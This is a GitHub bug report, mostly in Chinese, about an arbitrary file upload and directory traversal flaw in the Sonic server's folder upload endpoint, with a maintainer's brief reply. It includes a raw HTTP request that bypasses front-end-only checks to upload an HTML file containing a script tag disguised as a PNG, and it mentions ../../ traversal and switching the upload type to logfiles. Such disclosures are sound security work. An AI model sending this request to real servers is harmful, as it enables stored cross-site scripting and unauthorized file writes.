[Bug] 任意文件上传和目录穿越 #392
Labels
bug
Something isn't working
Comments
|
近期我找时间修一下 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Search before asking
Sonic version
最新服务器版
Deploy platform
window10
Minimal reproduce step
这个上传接口只有前端验证 可以上传png 然后抓包进行绕过
包:
POST /server/api/folder/upload HTTP/1.1
Host: ip
Content-Length: 460
SonicToken:
Accept-Language: zh_CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1AHSz0CNwNeWDnSP
Accept: /
Origin:
Referer:
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundary1AHSz0CNwNeWDnSP
<script>alert(1)</script> ------WebKitFormBoundary1AHSz0CNwNeWDnSP Content-Disposition: form-data; name="type"Content-Disposition: form-data; name="file"; filename="svgxss1.html"
Content-Type: image/png
imageFiles
------WebKitFormBoundary1AHSz0CNwNeWDnSP--
另外以跨目录进行上传
../../也可以
另外还纯在越权
可改为logfiles 和目录中其他的
Are you willing to submit a PR?
The text was updated successfully, but these errors were encountered: